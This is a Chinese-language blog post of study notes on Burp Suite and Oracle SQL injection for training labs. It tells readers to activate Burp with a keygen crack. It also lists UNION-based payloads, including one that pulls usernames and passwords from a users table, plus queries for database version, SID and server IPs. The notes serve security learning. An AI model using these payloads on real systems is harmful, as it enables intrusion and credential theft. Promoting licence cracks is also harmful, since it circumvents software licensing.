
    <!DOCTYPE html>
    <html lang="en"
            
          
    >
    <head>
    <meta charset="utf-8">
    

    

    
    <title>
        Burp的安装与使用，Oracle数据库注入 |
        
        Hexo</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CUbuntu%20Mono:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
    
<link rel="stylesheet" href="https://unpkg.com/@fortawesome/fontawesome-free/css/v4-font-face.min.css">

    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="Burp的安装与使用1.安装1.下载并安装Burp抓包软件（半汉化版），官网链接：https:&#x2F;&#x2F;portswigger.net&#x2F;burp2.cmd打开这个路径  3.在命令窗口输入Java -vision确认java版本是java19再输入java -jar burp-loader-keygen-2_1_06.jar然后会弹出下面的窗口 4.然后再双击汉化启动。 5.把左边的License复制到">
<meta property="og:type" content="article">
<meta property="og:title" content="Burp的安装与使用，Oracle数据库注入">
<meta property="og:url" content="http://example.com/2024/01/07/Burp%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8%EF%BC%8COracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Burp的安装与使用1.安装1.下载并安装Burp抓包软件（半汉化版），官网链接：https:&#x2F;&#x2F;portswigger.net&#x2F;burp2.cmd打开这个路径  3.在命令窗口输入Java -vision确认java版本是java19再输入java -jar burp-loader-keygen-2_1_06.jar然后会弹出下面的窗口 4.然后再双击汉化启动。 5.把左边的License复制到">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210752228.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210856162.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210931048.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210956036.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211022981.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211046129.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211121739.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211151152.png">
<meta property="og:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/1704631772252-94ef1c36-7d7c-428d-92f4-f17e840ffb84.png">
<meta property="article:published_time" content="2024-01-07T12:55:55.000Z">
<meta property="article:modified_time" content="2024-01-07T13:13:45.433Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210752228.png">
    
        <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
    
    
        <link rel="shortcut icon" href="/images/favicon.ico">
    
    
    
<link rel="stylesheet" href="/css/style.css">

    
        
<link rel="stylesheet" href="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">

    
    
    
    
    
<script src="https://unpkg.com/pace-js@1.2.4/pace.min.js"></script>

    
        
<link rel="stylesheet" href="https://unpkg.com/wowjs@1.1.3/css/libs/animate.css">

        
<script src="https://unpkg.com/wowjs@1.1.3/dist/wow.min.js"></script>

        <script>
          new WOW({
            offset: 0,
            mobile: true,
            live: false
          }).init();
        </script>
    
<meta name="generator" content="Hexo 7.0.0"></head>

    <body>
    
<div id='loader'>
  <div class="loading-left-bg"></div>
  <div class="loading-right-bg"></div>
  <div class="spinner-box">
    <div class="loading-taichi">
      <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="http://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
      <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff6e6b" />
      <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z" fill="#fd0d00" />
      <path d="M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95" fill="#fd0d00" />
    </svg>
    </div>
    <div class="loading-word">少女祈祷中...</div>
  </div>
</div>
</div>

<script>
  const endLoading = function() {
    document.body.style.overflow = 'auto';
    document.getElementById('loader').classList.add("loading");
  }
  window.addEventListener('load', endLoading);
  document.getElementById('loader').addEventListener('click', endLoading);
</script>


    <div id="container">
        <div id="wrap">
            <header id="header">
    
        <img data-src="/images/banner.jpg" data-sizes="auto" alt="Burp的安装与使用，Oracle数据库注入" class="lazyload">
    
    <div id="header-outer" class="outer">
        <div id="header-title" class="inner">
            <div id="logo-wrap">
                
                    
                    
                        <a href="/" id="logo"><h1>Burp的安装与使用，Oracle数据库注入</h1></a>
                    
                
            </div>
            
                
                
            
        </div>
        <div id="header-inner">
            <nav id="main-nav">
                <a id="main-nav-toggle" class="nav-icon"></a>
                
                    <span class="main-nav-link-wrap">
                        <span class="main-nav-icon"></span>
                        <a class="main-nav-link" href="/">Home</a>
                    </span>
                
                    <span class="main-nav-link-wrap">
                        <span class="main-nav-icon"></span>
                        <a class="main-nav-link" href="/archives">Archives</a>
                    </span>
                
                    <span class="main-nav-link-wrap">
                        <span class="main-nav-icon"></span>
                        <a class="main-nav-link" href="/about">About</a>
                    </span>
                
                    <span class="main-nav-link-wrap">
                        <span class="main-nav-icon"></span>
                        <a class="main-nav-link" href="/friend">Friend</a>
                    </span>
                
            </nav>
            <nav id="sub-nav">
                
                    <a id="nav-rss-link" class="nav-icon" href="/atom.xml"
                       title="RSS Feed"></a>
                
                
            </nav>
            <div id="search-form-wrap">
                <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
            </div>
        </div>
    </div>
</header>

            <div id="content" class="outer">
                <section id="main"><article id="post-Burp的安装与使用，Oracle数据库注入" class="h-entry article article-type-post"
         itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
    <div class="article-inner">
        <div class="article-meta">
            <div class="article-date wow slideInLeft">
    <a href="/2024/01/07/Burp%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8%EF%BC%8COracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5/" class="article-date-link">
        <time datetime="2024-01-07T12:55:55.000Z"
              itemprop="datePublished">2024-01-07</time>
    </a>
</div>

            

        </div>
        <div class="hr-line"></div>
        

        <div class="e-content article-entry" itemprop="articleBody">
            
                <h2 id="Burp的安装与使用"><a href="#Burp的安装与使用" class="headerlink" title="Burp的安装与使用"></a>Burp的安装与使用</h2><h3 id="1-安装"><a href="#1-安装" class="headerlink" title="1.安装"></a>1.安装</h3><p>1.下载并安装Burp抓包软件（半汉化版），官网链接：<a target="_blank" rel="noopener" href="https://portswigger.net/burp">https://portswigger.net/burp</a><br>2.cmd打开这个路径</p>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210752228.png" alt="image-20240107210752228"></p>
<p>3.在命令窗口输入Java -vision确认java版本是java19<br>再输入java -jar burp-loader-keygen-2_1_06.jar然后会弹出下面的窗口<br><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210856162.png" alt="image-20240107210856162"></p>
<p>4.然后再双击汉化启动。</p>
<p>5.把左边的License复制到右边，点击下一步&#x3D;&gt;手动激活。<br><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210931048.png" alt="image-20240107210931048"></p>
<p>6.过程1：把右边内容复制到左边<br>过程2：把左边下方内容复制到右边下方<br>点击下一个，激活成功</p>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107210956036.png" alt="image-20240107210956036"></p>
<h3 id="2-使用"><a href="#2-使用" class="headerlink" title="2.使用"></a>2.使用</h3><p>1.sqli第一关，用Burp抓包。依次点击Proxy–&gt;intercept–&gt;打开内置浏览器–&gt;复制第一关的链接粘贴到内置浏览器–&gt;HTTP history–&gt;对应的数据包</p>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211022981.png" alt="image-20240107211022981"></p>
<p>2.用Burp爆破。右击数据包–&gt;发送到repeater</p>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211046129.png" alt="image-20240107211046129"></p>
<ol start="3">
<li>1-50迭代。右击数据包–&gt;发送到intruder （intruder是爆破器 ）选择1–&gt;添加</li>
</ol>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211121739.png" alt="image-20240107211121739"></p>
<p>4.点击Payloads–&gt;Payloads type选择Numbers–&gt;1 50 1–&gt;点击发送</p>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/image-20240107211151152.png" alt="image-20240107211151152"></p>
<p>5.最后就可以看出哪些是可以用数字进行绕过操作的。</p>
<h2 id="Oracle数据库注入"><a href="#Oracle数据库注入" class="headerlink" title="Oracle数据库注入"></a>Oracle数据库注入</h2><p>靶场：<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/all-labs">https://portswigger.net/web-security/all-labs</a></p>
<p><img src="https://raw.githubusercontent.com/taijia12/tuchuang/main/image/1704631772252-94ef1c36-7d7c-428d-92f4-f17e840ffb84.png" alt="img"></p>
<p>Oracle数据库注入相关知识参考：<a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1944116">https://cloud.tencent.com/developer/article/1944116</a></p>
<h3 id="注入过程"><a href="#注入过程" class="headerlink" title="注入过程"></a>注入过程</h3><h3 id="1-获取元数据"><a href="#1-获取元数据" class="headerlink" title="1. 获取元数据"></a>1. 获取元数据</h3><p>Oracle 也支持查询元数据，下面是 Oracle 注入常用的元数据视图：</p>
<p>① user_tablespaces 视图，查看表空间</p>
<p>SELECT tablespace_name FROM user_tablespaces</p>
<p>② user_tables 视图，查看当前用户的所有表</p>
<p>SELECT table_name FROM user_tables WHERE rownum &#x3D; 1</p>
<p>③ user_tab_columns 视图，查看当前用户的所有列，如查询 user 表的所有列：</p>
<p>SELECT column_name FROM user_tab_columns WHERE table_name &#x3D; ‘users’</p>
<p>④ all_users 视图，查看 ORacle 数据库的所有用户</p>
<p>SELECT username FROM all_users</p>
<p>⑤ user_objects 视图，查看当前用户的所有对象 (表名称、约束、索引)</p>
<p>SELECT object_name FROM user_objects</p>
<h3 id="2-UNION-查询"><a href="#2-UNION-查询" class="headerlink" title="2. UNION 查询"></a>2. UNION 查询</h3><p>Oracle 与 MySQL 一样不支持多语句执行，不像 SQL Server 那样可以用分号隔开从而注入多条 SQL 语句。</p>
<p>①获取列的总数</p>
<p>获取列总数方法与前面两种数据库类似，依然可以使用 ORDER BY 子句来完成。</p>
<p>另一种方法是利用 UNION 关键字来确定，但是 Oracle 规定，每次查询时后面必须跟表的名称，否则查询将不成立。</p>
<p>在 Oracle 中可以使用：</p>
<p>UNION SELECT null, null, null …… FROM dual</p>
<p>这里的 dual 是 Oracle 中的虚拟表，在不知道数据库中存在哪些表的情况下，可以使用此表作为查询表。</p>
<p>然后获取非数字类型列，即可以显示出信息的列：</p>
<p>UNION SELECT ‘null’, null, null, …… FROM dual</p>
<p>UNION SELECT null, ‘null’, null, …… FROM dual</p>
<p>把每一位的 null 依次用单引号 ’ 引起来，如果报错，则不是字符串类型的列；如果返回正常，则是字符串类型的列，就可以在相应的位置插入查询语句获取信息。</p>
<p>② 获取敏感信息</p>
<p>常见的敏感信息如下：</p>
<p>当前用户权限：SELECT * FROM session_roles</p>
<p>当前数据库版本：SELECT banner FROM sys.v_$version WHERE rownum &#x3D; 1</p>
<p>服务器出口 IP：用utl_http.request 可以实现</p>
<p>服务器监听 IP：SELECT utl_inaddr.get_host_address FROM dual</p>
<p>服务器操作系统：SELECT member FROM v$logfile WHERE rownum &#x3D; 1</p>
<p>服务器 SID：SELECT instance_name FROM v$instance</p>
<p>当前连接用户：SELECT SYS_CONTEXT(‘USERENV’, ‘CURRENT_USER’) FROM dual</p>
<p>③ 获取数据库表及其内容</p>
<p>在得知表的列数之后，可以通过查询元数据的方式查询表名称、列名称，然后查询数据，如：</p>
<p><a target="_blank" rel="noopener" href="http://www.aaa.org/index.jsp?id=1">http://www.aaa.org/index.jsp?id=1</a> UNION SELECT username, password, null FROM users –</p>
<p>注意：在查询数据时同样要注意数据类型，否则无法查询，只能一一测试，改变参数的查询位置。</p>

            
        </div>
        <footer class="article-footer">
            <a data-url="http://example.com/2024/01/07/Burp%E7%9A%84%E5%AE%89%E8%A3%85%E4%B8%8E%E4%BD%BF%E7%94%A8%EF%BC%8COracle%E6%95%B0%E6%8D%AE%E5%BA%93%E6%B3%A8%E5%85%A5/" data-id="clr3imcea0000esvldygg35p7" data-title="Burp的安装与使用，Oracle数据库注入"
               class="article-share-link">Share</a>
            
            
            
            

        </footer>
    </div>
    
        
    <nav id="article-nav" class="wow fadeInUp">
        
            <div class="article-nav-link-wrap article-nav-link-left">
                
                    
                    
                        <img data-src="/images/banner.jpg" data-sizes="auto" alt="信息收集"
                             class="lazyload">
                    
                
                <a href="/2024/01/07/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"></a>
                <div class="article-nav-caption">Newer</div>
                <h3 class="article-nav-title">
                    
                        信息收集
                    
                </h3>
            </div>
        
        
            <div class="article-nav-link-wrap article-nav-link-right">
                
                    
                    
                        <img data-src="/images/banner.jpg" data-sizes="auto" alt="安全狗-waf绕过"
                             class="lazyload">
                    
                
                <a href="/2024/01/07/%E5%AE%89%E5%85%A8%E7%8B%97-waf%E7%BB%95%E8%BF%87/"></a>
                <div class="article-nav-caption">Older</div>
                <h3 class="article-nav-title">
                    
                        安全狗-waf绕过
                    
                </h3>
            </div>
        
    </nav>


    
</article>











</section>
                
                    <aside id="sidebar">
    <div class="sidebar-wrap wow fadeInRight">
        <div class="sidebar-author">
            <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="John Doe" class="lazyload">
            <div class="sidebar-author-name">John Doe</div>
            <div class="sidebar-description"></div>
        </div>
        <div class="sidebar-state">
            <div class="sidebar-state-article">
                <div>Posts</div>
                <div class="sidebar-state-number">23</div>
            </div>
            <div class="sidebar-state-category">
                <div>Categories</div>
                <div class="sidebar-state-number">0</div>
            </div>
            <div class="sidebar-state-tag">
                <div>Tags</div>
                <div class="sidebar-state-number">0</div>
            </div>
        </div>
        <div class="sidebar-social">
            
                <div class=icon-github>
                    <a href=https://github.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-google>
                    <a href=https://plus.google.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-twitter>
                    <a href=https://twitter.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-facebook>
                    <a href=https://www.facebook.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
        </div>
        <div class="sidebar-menu">
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Home</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/archives"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Archives</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/about"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">About</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/friend"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Friend</div>
                </div>
            
        </div>
    </div>
    
        

    
        

    
        
    <div class="widget-wrap wow fadeInRight">
        <h3 class="widget-title">Archives</h3>
        <div class="widget">
            <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/01/">January 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/12/">December 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">November 2023</a></li></ul>
        </div>
    </div>


    
</aside>

                
            </div>
            <footer id="footer" class="wow fadeInUp">
    <div style="width: 100%; overflow: hidden"><div class="footer-line"></div></div>
    <div class="outer">
        <div id="footer-info" class="inner">
            
            <div>
                <span class="icon-copyright"></span>
                2020-2024
                <span class="footer-info-sep"></span>
                John Doe
            </div>
            
                <div>
                    Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
                    Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
                </div>
            
            
                <div>
                    <span class="icon-brush"></span>
                    24.3k
                    &nbsp;|&nbsp;
                    <span class="icon-coffee"></span>
                    01:36
                </div>
            
            
                <div>
                    <span class="icon-eye"></span>
                    <span id="busuanzi_container_site_pv">Number of visits&nbsp;<span id="busuanzi_value_site_pv"></span></span>
                    &nbsp;|&nbsp;
                    <span class="icon-user"></span>
                    <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
                </div>
            
        </div>
    </div>
</footer>

        </div>
        <nav id="mobile-nav">
    <div class="sidebar-wrap">
        <div class="sidebar-author">
            <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="John Doe" class="lazyload">
            <div class="sidebar-author-name">John Doe</div>
            <div class="sidebar-description"></div>
        </div>
        <div class="sidebar-state">
            <div class="sidebar-state-article">
                <div>Posts</div>
                <div class="sidebar-state-number">23</div>
            </div>
            <div class="sidebar-state-category">
                <div>Categories</div>
                <div class="sidebar-state-number">0</div>
            </div>
            <div class="sidebar-state-tag">
                <div>Tags</div>
                <div class="sidebar-state-number">0</div>
            </div>
        </div>
        <div class="sidebar-social">
            
                <div class=icon-github>
                    <a href=https://github.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-google>
                    <a href=https://plus.google.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-twitter>
                    <a href=https://twitter.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
                <div class=icon-facebook>
                    <a href=https://www.facebook.com/yourname itemprop="url" target="_blank"></a>
                </div>
            
        </div>
        <div class="sidebar-menu">
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Home</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/archives"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Archives</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/about"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">About</div>
                </div>
            
                <div class="sidebar-menu-link-wrap">
                    <a class="sidebar-menu-link-dummy" href="/friend"></a>
                    <span class="sidebar-menu-icon"></span>
                    <div class="sidebar-menu-link">Friend</div>
                </div>
            
        </div>
    </div>
</nav>

        
<script src="https://unpkg.com/jquery@3.7.0/dist/jquery.min.js"></script>


<script src="https://unpkg.com/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://unpkg.com/clipboard@2.0.11/dist/clipboard.min.js"></script>



    
<script src="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>



    
<script src="https://unpkg.com/busuanzi@2.3.0/bsz.pure.mini.js"></script>






<script src="/js/script.js"></script>
















    </div>
    <div class="site-search">
        <div class="algolia-popup popup">
            <div class="algolia-search">
                <span class="algolia-search-input-icon"></span>
                <div class="algolia-search-input" id="algolia-search-input"></div>
            </div>

            <div class="algolia-results">
                <div id="algolia-stats"></div>
                <div id="algolia-hits"></div>
                <div id="algolia-pagination" class="algolia-pagination"></div>
            </div>

            <span class="popup-btn-close"></span>
        </div>
    </div>
    </body>
    </html>

